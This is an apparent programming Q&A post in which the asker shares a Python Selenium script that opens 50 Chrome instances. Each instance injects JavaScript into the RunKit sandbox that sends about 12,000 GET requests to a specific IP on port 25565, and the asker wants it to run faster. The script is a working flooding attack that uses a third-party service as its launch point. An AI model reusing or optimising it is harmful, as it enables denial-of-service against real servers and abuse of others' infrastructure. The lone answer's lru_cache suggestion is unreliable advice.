# any way to open multiple pages or browser without selenium crash the computer?

Tags: python, selenium, selenium-webdriver, webdriver

I would like to know if there is any way to open several pages or browsers with the same site doing the same function without crashing or consuming a lot of cpu some way that opens all browsers or pages very fast maybe in seconds or in 1 minute is there any way to optimize this script and make it not crash my computer? doing all these functions
do not need to be 100% optimized just in some way with the computer to respond after about 15 seconds with all pages open

```
import time
import threading
from selenium import webdriver
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.common.by import By
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.action_chains import ActionChains
urls = 'https://npm.runkit.com/'

def e():

 driver = webdriver.Chrome()
 driver.get("https://npm.runkit.com/")
 WebDriverWait(driver, 20).until(EC.frame_to_be_available_and_switch_to_it((By.XPATH,"//iframe[starts-with(@src, 'https://runkit.com/e/iframe')]")))
 time.sleep(10)
 element = WebDriverWait(driver, 20).until(EC.element_to_be_clickable((By.CSS_SELECTOR, "div.CodeMirror")))
 ActionChains(driver).move_to_element(element).click().send_keys("var axios = require('axios')\nvar i = 1;\nwhile (i < 1200) {\n    axios.get('http://190.115.196.123:25565/')    \ni = i + 0.1;\n}").perform()
 driver.find_element_by_xpath('/html/body/div/div/div/div/div/div/div/div[3]/div/div/div/div[2]/div[2]/div[1]/button').click()

for i in range(50):
    t = threading.Thread(target=e)
    t.start()
```

The faster the better

Answer (score 0):

you can optimize CPU consumption by using `lru_cache` decorator from `functools`

```
from functools import lru_cache

@lru_cache
def e():
    ...

...
```